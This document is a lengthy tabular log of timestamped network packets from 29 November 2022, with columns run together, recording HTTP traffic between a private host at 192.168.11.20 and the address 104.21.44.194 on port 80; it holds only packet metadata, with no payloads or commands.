                                                                          Nov 29, 2022 09:20:40.887897015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887914896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887947083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887967110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.887995005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888011932 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888014078 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888045073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888066053 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888104916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888139963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888160944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888180971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888199091 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888219118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888254881 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888276100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888320923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888340950 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888360023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888381958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888423920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888461113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888484001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520002 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888520956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888562918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888587952 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888617039 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888628006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888660908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888676882 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888689041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888710022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888720989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888731956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888751030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888761997 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888772964 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888782978 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888789892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888803005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888813972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888824940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888834953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888858080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888868093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888879061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888890028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888910055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888920069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888931036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888941050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888962030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888967037 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.888972998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888983965 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.888993979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889010906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889019966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889036894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889075994 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889096022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889108896 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889118910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889130116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889132977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889132977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889141083 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889151096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889162064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889172077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889180899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889192104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889202118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889211893 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889223099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889233112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889244080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889254093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889265060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889275074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889286041 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889296055 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889300108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889307022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889317989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889328003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889338970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889348984 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889364004 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889381886 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889400959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889419079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889430046 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889441013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889448881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889451981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889462948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889472961 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889482021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889492989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889503956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889513969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889524937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889534950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889545918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889556885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889566898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889578104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889589071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889599085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889616966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889617920 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889630079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889640093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889652967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889669895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889688969 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889707088 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889724970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889775991 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889970064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.889970064 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.891477108 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.891597033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.891850948 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.892024994 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.902976036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903084993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903098106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.903111935 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951692104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951702118 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951713085 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951723099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951762915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951762915 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951891899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951904058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951915026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951925039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951932907 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951936007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951946974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.951948881 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.951957941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.952078104 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.952078104 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.952078104 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.952078104 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.952078104 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.179246902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.179569960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.298357010 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.306837082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.306947947 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.306962013 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307080030 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307104111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307116032 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307126999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307137966 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307159901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307171106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307182074 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307192087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307210922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307215929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.307221889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307233095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307244062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307260036 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307271957 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307282925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307293892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307332993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307343960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307354927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307374001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307384968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307394981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307415009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.307492018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307512045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307523012 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307533979 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307543993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307554960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307565928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307575941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307585955 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.307759047 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.307845116 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307859898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307871103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307882071 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307893038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307904959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307929039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307930946 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.307940006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307950974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307961941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307972908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307984114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.307995081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308005095 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308016062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308027029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308037996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308048010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308058977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308069944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308080912 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308101892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308101892 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308202982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308213949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308224916 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308235884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308238029 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308247089 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308257103 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308268070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308279037 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308290005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308300018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308316946 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308326960 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308337927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308347940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308358908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308370113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308381081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308392048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308410883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308410883 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308444023 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308455944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308465958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308476925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308486938 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308497906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308509111 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308518887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308530092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308540106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308551073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308561087 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308572054 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308607101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308607101 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308741093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308748960 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308756113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308768034 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308779001 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308789968 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308800936 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308811903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308821917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308832884 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308844090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308855057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308865070 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308876038 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308886051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308897018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308907986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308919907 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308945894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308945894 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:41.308957100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308967113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308978081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:41.308988094 CET8049852104.21.44.194192.168.11.20
